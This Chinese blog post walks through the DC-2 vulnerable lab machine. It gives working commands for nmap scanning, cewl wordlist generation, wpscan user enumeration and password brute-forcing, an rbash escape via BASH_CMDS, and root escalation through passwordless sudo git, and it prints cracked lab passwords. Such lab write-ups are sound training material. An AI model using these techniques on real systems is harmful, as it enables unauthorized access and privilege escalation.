前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶机渗透DC-2

靶机渗透DC-2

原创
作者头像
HipHip
修改2020-04-15 10:30:59
5270
修改2020-04-15 10:30:59
举报
文章被收录于专栏:靶机渗透

DC实验室都挺好玩的,拿来玩玩,顺便记录下。

扫描存活主机。

001
001

nmap扫描一波。

002
002

再来个全端口扫描。

003
003

开了80和ssh端口,仍然是,首次访问先把ip加入hosts中。

004
004

看到了wordpress服务并看到了flag1

wordpress默认后台/wp-admin

005
005

需要账号密码,根据flag1提示,需要用到cewl生成密码字典。

代码语言:javascript
复制
cewl -w dc2.passwd.txt http://dc-2

006
006

然后wpscan扫描用户。

代码语言:javascript
复制
wpscan --url http://dc-2/ --enumerate u

007
007

三个用户。admin,jerry,tom

之后根据生成的密码文件和用户爆破密码。

代码语言:javascript
复制
wpscan --url http://dc-2/ -U tom -P "dc2.passwd.txt"
爆破后得到两个账号密码:
Username: tom, Password: parturient
Username: jerry, Password: adipiscing

然后再去后台登陆。

008
008

找到了flag2。

再用ssh登陆。

009
009

信息收集看看。

010
010

被~rbash阻挡了。

绕过它。

代码语言:javascript
复制
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash 
tom@DC-2:~$ ls
flag3.txt  set  usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found

现在是bash限制了。

代码语言:javascript
复制
export PATH=$PATH:/bin/
export -p

011
011

指定PATH地址。

012
012

找到flag3。

在目录里翻翻,找到了flag4。

013
013

进入root目录,发现权限不够。

014
014

根据flag3信息,su jerry登陆jerry账户。

015
015

sudo -l一下,发现直接是root,不用密码。

sudo git -p help

在最下面添加!/bin/bash

提权成功

016
016
017
017

找到最终flag。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • DC实验室都挺好玩的,拿来玩玩,顺便记录下。
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档